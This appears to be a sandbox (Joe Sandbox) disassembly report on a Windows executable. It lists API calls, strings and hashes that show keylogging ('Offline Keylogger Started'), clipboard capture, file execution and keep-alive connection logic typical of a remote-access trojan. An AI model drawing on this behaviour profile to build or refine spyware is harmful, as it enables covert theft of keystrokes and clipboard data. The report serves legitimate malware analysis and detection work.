                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C9D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$?begin@?$basic_string@?length@?$basic_string@D@1@@V01@@V10@V10@@$??2@?end@?$basic_string@ExecuteG@1@@LocalShellTimeV10@0@printf
                                                • String ID: Executing file: $[INFO]$open
                                                • API String ID: 4119484407-2604704123
                                                • Opcode ID: 3bed9d663014bf244eb53a2144bfc0b9fb76d710f38bad3c4ece149d7a420725
                                                • Instruction ID: d9ea162a00f2d85f2a64841ad60bdfc8b5f626de2847e39a60037bb7d6230f33
                                                • Opcode Fuzzy Hash: 3bed9d663014bf244eb53a2144bfc0b9fb76d710f38bad3c4ece149d7a420725
                                                • Instruction Fuzzy Hash: CD11F1B2510119AFDB05EFA1DC9ADEE777CFB14306B10456EF503A20A1EA789A448B68
                                                APIs
                                                  • Part of subcall function 0040A8FF: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040A920
                                                  • Part of subcall function 0040A8FF: RegQueryValueExW.ADVAPI32(80000000,00410E9A,00000000,00000000,?,00000400), ref: 0040A93F
                                                  • Part of subcall function 0040A8FF: RegCloseKey.ADVAPI32(80000000), ref: 0040A948
                                                  • Part of subcall function 0040A8FF: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 0040A967
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410EA7
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00409292), ref: 00410EBA
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410EC4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410ECD
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410EE6
                                                  • Part of subcall function 0041146F: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6C9BB010,?,?,00410EF5,?), ref: 0041147E
                                                  • Part of subcall function 0041146F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,00410EF5,?), ref: 0041149C
                                                  • Part of subcall function 0041146F: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00410EF5,?), ref: 004114A4
                                                  • Part of subcall function 0041146F: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,00410EF5,?), ref: 004114AF
                                                  • Part of subcall function 0041146F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,00410EF5,?), ref: 004114B9
                                                  • Part of subcall function 0041146F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114C2
                                                  • Part of subcall function 0041146F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114DA
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410EFC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410F05
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F12
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410F1B
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                                • String ID: .exe$http\shell\open\command
                                                • API String ID: 2647146128-4091164470
                                                • Opcode ID: 33277f11963d7f397d890b8c045dce3eaa13a1ec14160335fd81e132a05b4e33
                                                • Instruction ID: d6f4017d1acf330ffd9ea3a0570d33341eb30dc198aeee336e3e23a809a39518
                                                • Opcode Fuzzy Hash: 33277f11963d7f397d890b8c045dce3eaa13a1ec14160335fd81e132a05b4e33
                                                • Instruction Fuzzy Hash: BF11E27194021EABCF04FFE4DC59FED7738FB08705F444465F512A21A0DA78A649CB68
                                                APIs
                                                • EmptyClipboard.USER32 ref: 0040E2EC
                                                • CloseClipboard.USER32 ref: 0040E2F2
                                                • OpenClipboard.USER32 ref: 0040E2F9
                                                • GetClipboardData.USER32(00000001), ref: 0040E309
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E312
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040E31B
                                                • CloseClipboard.USER32 ref: 0040E321
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 0040E33A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@CloseGlobal$??0?$basic_string@D@1@@DataEmptyLockOpenUnlock
                                                • String ID: p6A
                                                • API String ID: 2271350782-595022129
                                                • Opcode ID: 5f85183f277970b019e3875f479872c14d498aae06fac14b29891d889604458d
                                                • Instruction ID: 25b37f9453d8c0a7fad6b549be2581ec204041f5fca4ac65e44eedbcceb3e4e3
                                                • Opcode Fuzzy Hash: 5f85183f277970b019e3875f479872c14d498aae06fac14b29891d889604458d
                                                • Instruction Fuzzy Hash: B0012872A001059BD711BFB6ED599EE7B69FB44303B00C47AF503E22A1DF388A058B69
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00401E32
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401E69
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419288,?,00419288,00419210), ref: 00401E90
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EA7
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EB4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EC1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401ECB
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401EE0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EE9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EF2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EFB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F04
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                                • String ID:
                                                • API String ID: 3851886811-0
                                                • Opcode ID: 35475c4ddffdd618ff9e1b11199be341707f1c70f5df902499f6b0395ddbab61
                                                • Instruction ID: 73a5bfb5004111d374c9cb7e56b00a1bb3738c2c6af1c5718f4dd4a1ca4aa882
                                                • Opcode Fuzzy Hash: 35475c4ddffdd618ff9e1b11199be341707f1c70f5df902499f6b0395ddbab61
                                                • Instruction Fuzzy Hash: 8221EF72800109ABCB04EFE0DD5A9DE7B78FB14315F10426AF512F20A1EB755A59CBA5
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406F55
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 00406F6D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00406F7D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00406F8C
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406FB4
                                                • atoi.MSVCRT(00000000), ref: 00406FBB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406FD8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040702F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                                • String ID: FunFunc
                                                • API String ID: 2980839617-81400306
                                                • Opcode ID: 281800f52224c484872fd29620b2c53c64ce7ae7eab454ec667632bd7bac0778
                                                • Instruction ID: a4306488e810cf182d76693ceca1b8f1be8bdcaab3c79d90a5d9b69e5bb3b8cd
                                                • Opcode Fuzzy Hash: 281800f52224c484872fd29620b2c53c64ce7ae7eab454ec667632bd7bac0778
                                                • Instruction Fuzzy Hash: B6217471A00205AFCF04BFB5EC1A9EE3768EB44716F008469F502E71E1EE389644CB5D
                                                APIs
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,75920F10,00419BC8,00000000,00419830,?,00408D5B,?,?,?,?,?,?,?,?,00000000), ref: 00404501
                                                  • Part of subcall function 004044C3: GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00404529
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,00408D5B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00404540
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00404554
                                                • CreateThread.KERNEL32(00000000,00000000,004045F8,00419830,00000000,00000000), ref: 00404572
                                                • CreateThread.KERNEL32(00000000,00000000,004045D8,00419830,00000000,00000000), ref: 00404582
                                                • CreateThread.KERNEL32(00000000,00000000,00404607,00419830,00000000,00000000), ref: 0040458E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404593
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@CreateD@1@@Thread$D@2@@0@G@2@@std@@G@std@@Hstd@@V01@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@KeyboardLayoutLocalTimeV01@@V10@V10@@Y?$basic_string@sprintf
                                                • String ID: Offline Keylogger Started$[INFO]
                                                • API String ID: 2102710441-3749928830
                                                • Opcode ID: 145f15bd44ed501514a613082b83bf21b5f087e840335586520c2844996bdea1
                                                • Instruction ID: ac7562e33836bebb496a87afd1c3c4dd197c8ef72cbbef37b559c4ef06f2e268
                                                • Opcode Fuzzy Hash: 145f15bd44ed501514a613082b83bf21b5f087e840335586520c2844996bdea1
                                                • Instruction Fuzzy Hash: 991190712001447BD321BB66DC8DDEF3E7CEAC2B96B00446EF90251181DA795A48C7B9
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405F93
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00419818,?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405FB9
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404E4B), ref: 00405FCB
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670,?,?,?,00404E4B), ref: 00405FDA
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],00419818,[End of clipboard text]), ref: 00405FFC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406006
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406018
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404E4B), ref: 00406021
                                                Strings
                                                • [End of clipboard text], xrefs: 00405FF0
                                                • [Following text has been copied to clipboard:], xrefs: 00405FF6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                                • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                                • API String ID: 1191203583-3441917614
                                                • Opcode ID: c2372836ba6a479ec8bb9c0e366ea666785bf95403053d0e84f6d5f574d2177e
                                                • Instruction ID: 6ab36fa8e7f9ea28d027e51379386bb7229d2b7762e6091e91c455ed35123c8d
                                                • Opcode Fuzzy Hash: c2372836ba6a479ec8bb9c0e366ea666785bf95403053d0e84f6d5f574d2177e
                                                • Instruction Fuzzy Hash: 8D1181769001096BCF04FBA5E95AAEF7B6CDB45326F10407AF401F3181DB789E4986AE
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?,00419D80,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C7C6), ref: 00402525
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,0040C7C6,?,?,?,00419D80,00000000), ref: 00402551
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419D80,00000000), ref: 0040255C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419D80,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C7C6), ref: 00402566
                                                • printf.MSVCRT ref: 0040256D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402579
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402582
                                                • CreateThread.KERNEL32(00000000,00000000,004026DD,00419D80,00000000,00000000), ref: 00402599
                                                Strings
                                                • %02i:%02i:%02i:%03i [INFO] , xrefs: 0040254C
                                                • KeepAlive Enabled! Timeout: %i seconds, xrefs: 00402546
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                                • API String ID: 3715082883-586133315
                                                • Opcode ID: 97c5dfa4d2791e509be96d35347931a4ddd681f8eb6d1e2ed942bf0870862964
                                                • Instruction ID: a544af9e8bc66dbf167339bc81ab0b860872f7a93b4acc1343a57414d3e3f440
                                                • Opcode Fuzzy Hash: 97c5dfa4d2791e509be96d35347931a4ddd681f8eb6d1e2ed942bf0870862964
                                                • Instruction Fuzzy Hash: 67118676900218BFCB11AFD5DC49CFFBB7CBE05706704446AF502E2191D6B8AA44C768
                                                APIs
                                                • Sleep.KERNEL32(000003E8), ref: 0040270E
                                                • GetLocalTime.KERNEL32(?), ref: 00402730
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 0040275B
